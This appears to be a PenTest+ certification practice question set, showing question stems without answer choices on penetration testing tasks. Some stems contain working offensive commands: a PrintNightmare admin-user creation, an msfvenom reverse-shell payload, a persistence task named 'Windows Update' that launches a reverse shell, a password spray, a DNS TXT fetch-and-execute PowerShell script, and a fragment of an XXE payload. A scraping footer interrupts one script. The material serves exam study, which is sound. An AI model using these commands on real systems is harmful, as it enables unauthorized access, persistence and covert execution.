PenTest+ Exam

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that
is not connected to the internet or enterprise network. Which of the following should the tester
utilize to conduct the testing?

During an assessment, a penetration tester manages to get RDP access via a low-privilege
user. The tester attempts to escalate privileges by running the following commands:
Import-Module .PrintNightmare.ps1
Invoke-Nightmare -NewUser “hacker” -NewPassword “Password123!” -DriverName “Print”
The tester attempts to further enumerate the host with the new administrative privileges by
using the runas command. However, the access level is still low. Which of the following
actions should the penetration tester take next?

A penetration tester is attempting to exfiltrate sensitive data from a client environment without
alerting the client’s blue team. Which of the following exfiltration methods most likely remain
undetected?

A company hires a penetration tester to test the security of its wireless networks. The main
goal is to intercept and access sensitive data.
Which of the following tools should the security professional use to best accomplish this
task?

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP
and UDP services. Which of the following commands should the tester use?

A tester compromises a target host and then wants to maintain persistent access. Which of
the following is the best way for the attacker to accomplish the objective?

During a penetration test, the tester identifies several unused services that are listening on all
targeted internal laptops. Which of the following technical controls should the tester
recommend to reduce the risk of compromise?

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the
client. The team crafts a Bash script for this task. However, they find a minor error in one line
of the script:
1 #!/bin/bash
2 for i in $(cat example.txt); do
3 curl $i
4 done
Which of the following changes should the team make to line 3 of the script?

With one day left to complete the testing phase of an engagement, a penetration tester
obtains the following results from an Nmap scan:
Not shown: 1670 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 (CentOS)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
Which of the following tools should the tester use to quickly identify a potential attack path?

A penetration tester currently conducts phishing reconnaissance using various tools and
accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some
of the tools and accounts into one solution to analyze the output from the intelligencegathering tools. Which of the following is the best tool for the penetration tester to use?

A tester plans to perform an attack technique over a compromised host. The tester prepares
a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f
csharp The tester then takes the shellcode from the msfvenom command and creates a file
called evil.xml. Which of the following commands would most likely be used by the tester to
continue with the attack on the host?

A penetration tester observes the following output from an Nmap command while attempting
to troubleshoot connectivity to a Linux server:
Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC
Nmap scan report for example.com (192.168.1.10)
Host is up (0.001s latency).
Not shown: 9999 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
2222/tcp open ssh
444/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Which of the following is the most likely reason for the connectivity issue?

A tester performs a vulnerability scan and identifies several outdated libraries used within the
customer SaaS product offering. Which of the following types of scans did the tester use to
identify the libraries?

Which of the following techniques is the best way to avoid detection by Data Loss Prevention
(DLP) tools?

During a penetration test, a tester attempts to pivot from one Windows 10 system to another
Windows system.
The penetration tester thinks a local firewall is blocking connections. Which of the following
command-line utilities built into Windows is most likely to disable the firewall?

A penetration tester gains initial access to an endpoint and needs to execute a payload to
obtain additional access. Which of the following commands should the penetration tester
use?

During a red-team exercise, a penetration tester obtains an employee’s access badge. The
tester uses the badge’ s information to create a duplicate for unauthorized entry.
Which of the following best describes this action?

A penetration testing team needs to determine whether it is possible to disrupt the wireless
communications for PCs deployed in the client’s offices. Which of the following techniques
should the penetration tester leverage?

A tester gains initial access to a server and needs to enumerate all corporate domain DNS
records.
Which of the following commands should the tester use?

A penetration tester gains access to a Windows machine and wants to further enumerate
users with native operating system credentials. Which of the following should the tester use?

Which of the following describes the process of determining why a vulnerability scanner is not
providing results?

A penetration tester is ready to add shellcode for a specific remote executable exploit. The
tester is trying to prevent the payload from being blocked by antimalware that is running on
the target. Which of the following commands should the tester use to obtain shell access?

Given the following statements:
* Implement a web application firewall.
* Upgrade end-of-life operating systems.
* Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be
found?

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the
files is part of the scope of the test, which of the following is most likely to evade DLP
systems?

During a penetration testing engagement, a tester targets the internet-facing services used
by the client. Which of the following describes the type of assessment that should be
considered in this scope of work?

A penetration tester needs to confirm the version number of a client’s web application server.
Which of the following techniques should the penetration tester use?

A client recently hired a penetration testing firm to conduct an assessment of their consumerfacing web application. Several days into the assessment, the client’s networking team
observes a substantial increase in DNS traffic. Which of the following would most likely
explain the increase in DNS traffic?

Which of the following frameworks can be used to classify threats?

A penetration tester established an initial compromise on a host. The tester wants to pivot to
other targets and set up an appropriate relay. The tester needs to enumerate through the
compromised host as a relay from the tester’s machine. Which of the following commands
should the tester use to do this task from the tester’s host?

A penetration tester needs to help create a threat model of a custom application. Which of
the following is the most likely framework the tester will use?

Which of the following will reduce the possibility of introducing errors or bias in a penetration
test report?

While performing a penetration testing exercise, a tester executes the following command:
bash
Copy code

PS c:tools> c:hacksPsExec.exe \server01.comptia.org -accepteula cmd.exe Which of the
following best explains what the tester is trying to do?

A penetration tester identifies an exposed corporate directory containing first and last names
and phone numbers for employees. Which of the following attack techniques would be the
most effective to pursue if the penetration tester wants to compromise user accounts?

A tester completed a report for a new client. Prior to sharing the report with the client, which
of the following should the tester request to complete a review?

A penetration tester wants to use the following Bash script to identify active servers on a
network:
1 network_addr=”192.168.1″
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo “Host $h is up”
6 else
7 echo “Host $h is down”
8 fi
9 done
Which of the following should the tester do to modify the script?

During an assessment, a penetration tester gains access to one of the internal hosts. Given
the following command: schtasks /create /sc onlogon /tn “Windows Update” /tr “cmd.exe /c reverse_shell.exe” Which
of the following is the penetration tester trying to do with this code?

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent: ]> &foo; Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

A penetration tester is conducting reconnaissance for an upcoming assessment of a large
corporate client. The client authorized spear phishing in the rules of engagement. Which of
the following should the tester do first when developing the phishing campaign?

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on
several hosts. Based on the targets’ EPSS (Exploit Prediction Scoring System) and CVSS
(Common Vulnerability Scoring System) scores, which of the following targets is the most
likely to get attacked?

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data
covertly and evade detection?

Which of the following elements of a penetration test report can be used to most effectively
prioritize the remediation efforts for all the findings?

A penetration tester is conducting a vulnerability scan. The tester wants to see any
vulnerabilities that may be visible from outside of the organization. Which of the following
scans should the penetration tester perform?

While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?

Which of the following components should a penetration tester include in the final assessment report?

While conducting an assessment, a penetration tester identifies details for several
unreleased products announced at a company-wide meeting.
Which of the following attacks did the tester most likely use to discover this information?

Which of the following can an access control vestibule help deter?

A penetration tester wants to check the security awareness of specific workers in the
company with targeted attacks. Which of the following attacks should the penetration tester
perform?

A penetration tester discovers data to stage and exfiltrate. The client has authorized
movement to the tester’s attacking hosts only. Which of the following would be most
appropriate to avoid alerting the SOC?

A penetration tester gains shell access to a Windows host. The tester needs to permanently
turn off protections in order to install additional payload. Which of the following commands is
most appropriate?

While conducting a reconnaissance activity, a penetration tester extracts the following
information:
Emails: – admin@acme.com – sales@acme.com – support@acme.com
Which of the following risks should the tester use to leverage an attack as the next step in the
security assessment?

Which of the following activities should be performed to prevent uploaded web shells from
being exploited by others?

A penetration tester is searching for vulnerabilities or misconfigurations on a container
environment. Which of the following tools will the tester most likely use to achieve this
objective?

A penetration tester launches an attack against company employees. The tester clones the
company’s intranet login page and sends the link via email to all employees.
Which of the following best describes the objective and tool selected by the tester to perform
this activity?

A penetration tester creates a list of target domains that require further enumeration. The
tester writes the following script to perform vulnerability scanning across the domains:
line 1: #!/usr/bin/bash
line 2: DOMAINS_LIST = “/path/to/list.txt”
line 3: while read -r i; do
line 4: nikto -h $i -o scan-$i.txt &
IT Certification Guaranteed, The Easy Way!
5
line 5: done
The script does not work as intended. Which of the following should the tester do to fix the
script?

A penetration tester gains access to a host but does not have access to any type of shell.
Which of the following is the best way for the tester to further enumerate the host and the
environment in which it resides?

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test
are safely handled. Which of the following is the best procedure for maintaining client data
privacy?

During an internal penetration test, a tester compromises a Windows OS-based endpoint and
bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an
Active Directory (AD) local domain.
The tester’s main goal is to leverage credentials to authenticate into other systems within the
Active Directory environment.
Which of the following steps should the tester take to complete the goal?

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz
and 5GHz access points. The tester places a wireless USB dongle in the laptop to start
capturing WPA2 handshakes. Which of the following steps should the tester take next?

A penetration tester enumerates a legacy Windows host on the same subnet. The tester
needs to select exploit methods that will have the least impact on the host’s operating
stability. Which of the following commands should the tester try first?

A penetration tester writes the following script, which is designed to hide communication and
bypass some restrictions on a client’s network:
$base64cmd = Resolve-DnsName foo.comptia.org -Type TXT | Select-Object –
ExpandProperty Strings
$decodecmd =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String
($base64cmd)) Powershell -C $decodecmd Which of the following best describes the
technique the tester is applying?